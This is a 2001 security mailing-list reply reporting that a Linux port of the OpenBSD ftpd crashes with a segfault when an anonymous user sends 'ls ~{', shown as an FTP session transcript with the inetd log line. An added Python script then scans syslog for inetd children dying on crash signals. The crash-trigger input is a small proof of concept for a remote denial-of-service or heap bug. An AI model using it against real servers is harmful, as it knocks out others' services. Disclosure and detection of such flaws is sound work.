Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability

From: script0r (script0rat_private)
Date: Wed Nov 28 2001 - 15:36:19 PST


    >
    > ---------------------------------------------------------------------------
    >                              Security Alert
    >
    > Subject:      Wu-Ftpd File Globbing Heap Corruption Vulnerability
    > BUGTRAQ ID:   3581                   CVE ID:         CVE-MAP-NOMATCH
    > Published:    Nov 27, 2001           Updated:        Nov 28, 2001 01:12:56
    >
    > Remote:       Yes                    Local:          No
    > Availability: Always                 Authentication: Not Required
    > Credibility:  Vendor Confirmed       Ease:           No Exploit Available
    > Class:        Failure to Handle Exceptional Conditions
    >
    > Impact:   10.0           Severity: 10.0            Urgency:  8.2
    >
    > Last Change:  Initial analysis.
    > --------------------------------------------------------------------------
    
    I am running a Linux port of the BSD ftpd and it might be vulnerable to
    a similar attack:
    
    ftp localhost
    Connected to localhost.
    220 playlandFTP server (Version 6.5/OpenBSD, linux port 0.3.3) ready.
    Name (localhost:user): ftp
    331 Guest login ok, type your name as password.
    Password:
    230 Guest login ok, access restrictions apply.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls ~{
    200 PORT command successful.
    421 Service not available, remote server has closed connection
    
    In inetd I find an error stating that the ftpd process has died unexpectedly:
    
    Nov 28 14:21:28 playland inetd[82]: pid 16341: exit signal 11
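
For defenders watching for the symptom reported in the message above, this added example (not part of the original post) scans syslog lines in the inetd format quoted there and flags children that died on a crash signal. The signal table assumes Linux x86 numbering; `examplehost`, the function names and all sample lines except the first are constructed.

```python
import re
from collections import Counter

# Linux x86 signal numbers that mean the child crashed (assumption: Linux host).
CRASH_SIGNALS = {4: "SIGILL", 6: "SIGABRT", 7: "SIGBUS", 8: "SIGFPE", 11: "SIGSEGV"}

# Line format as quoted in the post:
#   Nov 28 14:21:28 playland inetd[82]: pid 16341: exit signal 11
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"inetd\[\d+\]: pid (?P<pid>\d+): exit signal (?P<sig>\d+)\s*$"
)

def find_crashes(lines):
    """Return one dict per inetd child that exited on a crash signal."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not an inetd "exit signal" line
        sig = int(m.group("sig"))
        if sig in CRASH_SIGNALS:  # SIGTERM, SIGKILL etc. are not crashes
            hits.append({"ts": m.group("ts"), "host": m.group("host"),
                         "pid": int(m.group("pid")), "signal": CRASH_SIGNALS[sig]})
    return hits

def hosts_over_threshold(hits, threshold=2):
    """Hosts with repeated crashes, which merit a closer look than a one-off."""
    counts = Counter(h["host"] for h in hits)
    return {host: n for host, n in counts.items() if n >= threshold}

# First line is the one quoted in the post; the rest are constructed samples
# (second crash, a SIGTERM exit, another host, an unrelated daemon).
SAMPLE_LOG = [
    "Nov 28 14:21:28 playland inetd[82]: pid 16341: exit signal 11",
    "Nov 28 14:21:40 playland inetd[82]: pid 16355: exit signal 11",
    "Nov 28 14:22:03 playland inetd[82]: pid 16360: exit signal 15",
    "Nov 28 14:25:10 examplehost inetd[77]: pid 2201: exit signal 6",
    "Nov 28 14:25:11 playland sshd[900]: Accepted password for user",
]

if __name__ == "__main__":
    crashes = find_crashes(SAMPLE_LOG)
    for c in crashes:
        print(f'{c["ts"]} {c["host"]} pid={c["pid"]} died on {c["signal"]}')
    print("repeat offenders:", hosts_over_threshold(crashes))
```

The inetd line carries only a pid, not a service name, so attributing a hit to ftpd means correlating it with the FTP session log for the same time.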
    